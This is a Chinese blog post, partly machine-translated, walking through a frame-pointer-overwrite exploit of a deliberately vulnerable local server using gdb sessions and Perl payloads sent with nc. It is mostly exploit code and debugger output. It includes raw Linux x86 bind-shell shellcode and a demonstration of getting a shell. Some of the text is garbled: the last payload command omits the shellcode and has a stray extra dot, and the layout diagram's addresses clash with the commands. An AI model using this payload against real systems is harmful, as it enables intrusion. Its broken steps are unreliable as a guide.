linux fp指针 pc指针帧指针,帧指针覆盖演示(II)

verbaWP

于 2021-05-25 15:12:42 发布

阅读量470

点赞数

文章标签： linux fp指针 pc指针帧指针

bugs@linux:~$ gcc -o

fposerv fposerv.cbugs@linux:~$ ./fposerv

Usage: ./fposerv portbugs@linux:~$ gdb

fposerv

GNU gdb 6.5

(gdb) break

main

断点 1 位于 0x8048673

(gdb) disas vuln

汇编代码：

0x080485da :

push %ebp

0x080485db :

mov %esp,%ebp

0x080485dd :

sub $0x428,%esp

0x080485e3 :

movl $0x0,0xfffffbe4(%ebp)

0x080485ed :

sub $0x4,%esp

0x080485f0 :

push $0x400

0x080485f5 :

push $0x0

0x080485f7 :

lea 0xfffffbf8(%ebp),%eax

0x080485fd :

push %eax

0x080485fe :

call 0x80484a8

0x08048603 :

add $0x10,%esp

0x08048606 :

sub $0xc,%esp

0x08048609 :

pushl 0x8(%ebp)

0x0804860c :

call 0x8048448

0x08048611 :

add $0x10,%esp

0x08048614 :

cmp $0x40c,%eax

0x08048619 :

ja 0x8048648

0x0804861b :

mov 0x8(%ebp),%eax

0x0804861e :

cmpb $0x0,(%eax)

0x08048621 :

je 0x804866b

0x08048623 :

mov 0xfffffbe4(%ebp),%eax

0x08048629 :

lea 0xfffffff8(%ebp),%edx

0x0804862c :

add %edx,%eax

0x0804862e :

lea 0xfffffc00(%eax),%edx

0x08048634 :

mov 0x8(%ebp),%eax

0x08048637 :

incl 0x8(%ebp)

0x0804863a :

mov (%eax),%al

0x0804863c :

mov %al,(%edx)

0x0804863e :

lea 0xfffffbe4(%ebp),%eax

0x08048644 :

incl (%eax)

0x08048646 :

jmp 0x804861b

0x08048648 :

sub $0xc,%esp

0x0804864b :

pushl 0x8(%ebp)

0x0804864e :

call 0x8048448

0x08048653 :

add $0x10,%esp

0x08048656 :

cmp $0x40c,%eax

0x0804865b :

ja 0x804866b

0x0804865d :

sub $0xc,%esp

0x08048660 :

pushl 0xc(%ebp)

0x08048663 :

call 0x80485b4

0x08048668 :

add $0x10,%esp

0x0804866b :

leave 0x0804866c :

ret 结束汇编。

(gdb) break *vuln+145

Breakpoint 2 at 0x804866b

(gdb) r 5555

Starting program: /home/bugs/fposerv 5555

断点 1, 0x08048673 位于 main ()

(gdb) x/x $ebp

0xbffff4c8: 0xbffff4e8

(gdb) x/x $ebp+4

0xbffff4cc: 0x4004728b

(gdb) c

Continuing.

[Terminal #2]

bugs@linux:~$ perl -e

'print "\x44\x43\x42\x41" x 259' | nc localhost

5555

[Terminal #1]

Breakpoint 2, 0x0804866b 位于 vuln ()

(gdb) c

Continuing.

程序接收信号SIGSEGV，线段故障。

0x08048825 位于 readsock ()

(gdb) i r

eax 0xbffff05c -1073745828

ecx 0x0 0

edx 0xbfffec3b -1073746885

ebx 0x4015bff0 1075167216

esp 0xbfffec44 0xbfffec44

ebp 0x41424344 0x41424344

esi 0xbffff520 -1073744608

edi 0x2 2

eip 0x8048825 0x8048825

eflags 0x10296 [ PF AF SF IF RF ]

cs 0x23 35

ss 0x2b 43

ds 0x2b 43

es 0x2b 43

fs 0x0 0

gs 0x0 0

(gdb) x/12x $esp

0xbfffec44: 0x00000007 0x00000800 0x00000000 0x41424344

0xbfffec54: 0x41424344 0x41424344 0x41424344 0x41424344

0xbfffec64: 0x41424344 0x41424344 0x41424344 0x41424344

(gdb) x/x 0xbfffec50

0xbfffec50: 0x41424344

(gdb) c

Continuing.

程序接收信号SIGSEGV，线段故障。

程序不在存在。

(gdb) r 5555

启动程序：/home/bugs/fposerv 5555

断点 1, 0x08048673 位于 main ()

(gdb) c

Continuing.

[Terminal #2]

bugs@linux:~$ perl -e

'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .

"\x44\x43\x42\x41" x 254 . "\x50\xec\xff\xbf"' | nc localhost

5555

[Terminal #1]

断点 2, 0x0804866b 位于 vuln ()

(gdb) c

Continuing.

程序接收信号SIGSEGV，线段故障。

0x41414141 位于 ?? ()

(gdb) x/x 0xbfffec50

0xbfffec50: 0x41414141

(gdb) x/x 0xbfffec60

0xbfffec60: 0x41424344

(gdb) c

Continuing.

程序接收信号SIGSEGV，线段故障。

程序不在存在。

(gdb) r 5555

启动程序：/home/bugs/fposerv 5555

断点 1, 0x08048673 位于 main ()

(gdb) c

Continuing.

[Terminal #2]

bugs@linux:~$ perl -e

'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .

"\x44\x43\x42\x41" x 254 . "\x60\xec\xff\xbf"' | nc localhost

5555

[Terminal #1]

程序接收信号SIGSEGV，线段故障。

0x41424344 位于 ?? ()

(gdb) c

Continuing.

程序接收信号SIGSEGV，线段故障。

程序不在存在。

(gdb)

[Terminal #2]

bugs@linux:~$ pcalc 254*4

(以前的缓冲地址缓冲区)

1016 0x3f8 0y1111111000bugs@linux:~$ pcalc

1016-800 (缺少nops)

216 0xd8 0y11011000bugs@linux:~$ pcalc

216-84 (缺少shellcode)

132 0x84 0y10000100bugs@linux:~$ pcalc 132/4

(新的返回地址空间)

33 0x21 0y100001bugs@linux:~$

[Terminal #1]

(gdb) r 5555

Starting program: /home/bugs/fposerv 5555

断点 1, 0x08048673 位于 main ()

(gdb) c

Continuing.

[Terminal #2]

bugs@linux:~$ perl -e

'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .

"\x44\x43\x42\x41" x 33 . "\x90" x 800 .

"\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

. "\x60\xec\xff\xbf"' | nc localhost 5555

[Terminal #1]

断点 2, 0x0804866b 位于 vuln ()

(gdb) c

Continuing.

程序接收信号SIGSEGV，线段故障。

0x41424344 位于 ?? ()

(gdb) x/250x

$esp 0xbfffec68: 0x41424344 0x41424344 0x41424344 0x41424344

0xbfffec78: 0x41424344 0x41424344 0x41424344 0x41424344

0xbfffec88: 0x41424344 0x41424344 0x41424344 0x41424344

0xbfffec98: 0x41424344 0x41424344 0x41424344 0x41424344

0xbfffeca8: 0x41424344 0x41424344 0x41424344 0x41424344

0xbfffecb8: 0x41424344 0x41424344 0x41424344 0x41424344

0xbfffecc8: 0x41424344 0x41424344 0x41424344 0x41424344

0xbfffecd8: 0x41424344 0x41424344 0x41424344 0x90909090

0xbfffece8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffecf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffed98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffeda8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffedb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffedc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffedd8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffede8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffedf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffee98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffeea8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffeeb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffeec8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffeed8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffeee8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffeef8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffef98: 0x90909090 0x90909090 0x90909090 0x90909090

---Type to continue, or q

to quit---

0xbfffefa8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffefb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffefc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffefd8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffefe8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffeff8: 0x90909090 0x90909090 0x90909090 0x6a58666a

0xbffff008: 0x52995b01 0x89026a53 0x5280cde1 0x02ff6843

0xbffff018: 0xe189ecce 0x5051106a 0xc689e189 0x80cd66b0

0xbffff028: 0x66b04343 0x565280cd 0xb043e189 0x8980cd66

0xbffff038: 0xb0c389d9 0x80cd493f 0x52f8e241 0x732f6e68

0xbffff048: 0x2f2f6868 0xe3896962

(gdb) d

Delete all breakpoints? (y or n) y

(gdb) r 5555

启动程序：/home/bugs/fposerv 5555

[Terminal #2]

损坏最后的有效载荷：

填充料 -> _init 储存 ebp -> main()的返回地址

-> 目标

eip -> nops -> shellcode -> 缓冲区地址

[A *

8]->[\xe8\xf0\xff\xbf]->[\x8b\x72\x04\x40]->[\x08\xee\xff\xbf

* 33]->[\x90 *

800]->[\x6a.....\x80]->[\x90\xec\xff\xbf]

bytes 4

bytes 132

bytes 800

bytes 84

bytes 4 bytes

有效载荷总大小：1036 字节

bugs@linux:~$ perl -e

'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .

"\x08\xee\xff\xbf" x 33 . "\x90" x 800 .

. "\x60\xec\xff\xbf"' | nc localhost 5555

[CRTL+C]

bugs@linux:~$ netstat

-antp | grep 52972

tcp 0 0

0.0.0.0:52972 0.0.0.0:* LISTEN 7089/fposervbugs@linux:~$ nc

localhost 52972

[Terminal #1]

程序接收信号SIGSEGV，Trace/breakpoint trap.

0x400007b0 in _start () from /lib/ld-linux.so.2

(gdb) c

Continuing.

[Terminal #2]

uid=1000(bugs) gid=100(users) groups=100(users)

exitbugs@linux:~$

Questions. Comments. Concerns. -->

HacK01[at]Live.cn ::

:: Hacker Netspy [Czy] ::

verbaWP

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
linux fp指针 pc指针帧指针,帧指针覆盖演示(II)

bugs@linux:~$ gcc -ofposerv fposerv.cbugs@linux:~$ ./fposervUsage: ./fposerv portbugs@linux:~$ gdbfposervGNU gdb 6.5Copyright (C) 2006 Free Software Foundation, Inc.(gdb) breakmain断点 1 位于 0x8048673(gd...
复制链接

扫一扫